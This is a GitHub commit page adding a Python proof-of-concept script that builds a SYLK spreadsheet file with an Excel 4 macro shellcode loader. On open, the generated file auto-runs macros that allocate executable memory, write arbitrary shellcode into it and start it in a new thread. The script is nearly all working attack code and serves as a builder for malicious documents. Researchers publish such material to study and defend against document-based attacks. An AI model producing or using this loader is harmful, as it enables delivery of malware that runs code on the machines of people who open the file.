Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
stanhegt authored Oct 30, 2019
1 parent 260e0e6 commit 144ffa1
Showing 1 changed file with 57 additions and 0 deletions.
57 changes: 57 additions & 0 deletions shellcode_to_sylk.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
#!/usr/bin/python3

# PoC Python code to create a SYLK file with Excel4 shellcode loader.
#
# Author: Stan Hegt (@StanHacked)
#
# Just a proof of concept. Needs polishing before use in actual operations.
# Or as Adam Chester would put it: "RWX for this POC, because... yolo"
#
# Background details: https://outflank.nl/blog/2019/10/30/abusing-the-sylk-file-format/

import sys

SYLK_TEMPLATE = """ID;P
O;E
NN;NAuto_open;ER1C1
C;X1;Y1;ER1C2()
C;X1;Y2;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
C;X1;Y3;ESELECT(R1C2:R1000:C2,R1C2)
C;X1;Y4;ESET.VALUE(R1C3, 0)
C;X1;Y5;EWHILE(LEN(ACTIVE.CELL())>0)
C;X1;Y6;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
C;X1;Y7;ESET.VALUE(R1C3, R1C3 + 1)
C;X1;Y8;ESELECT(, "R[1]C")
C;X1;Y9;ENEXT()
C;X1;Y10;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
C;X1;Y11;EHALT()
"""

def shellcode_to_sylk(shellcode_path):
sylk_output = SYLK_TEMPLATE

charinline = 0
cell = 1

with open(shellcode_path, "rb") as f:
byte = f.read(1)
while byte != b"":
if charinline == 0:
sylk_output += ("C;X2;Y%s;E" % (str(cell)))
cell += 1
else:
sylk_output+=("&")
sylk_output += ("CHAR(" + str(ord(byte)) + ")")
byte = f.read(1)
charinline += 1
if charinline == 20:
sylk_output += ("\n")
charinline = 0
sylk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
return sylk_output

if len(sys.argv) < 2:
print("Usage: ./shellcode_to_sylk.py file.bin")
print("file.bin should contain x86 shellcode without null bytes.")
else:
print(shellcode_to_sylk(sys.argv[1]))

0 comments on commit 144ffa1

Please sign in to comment.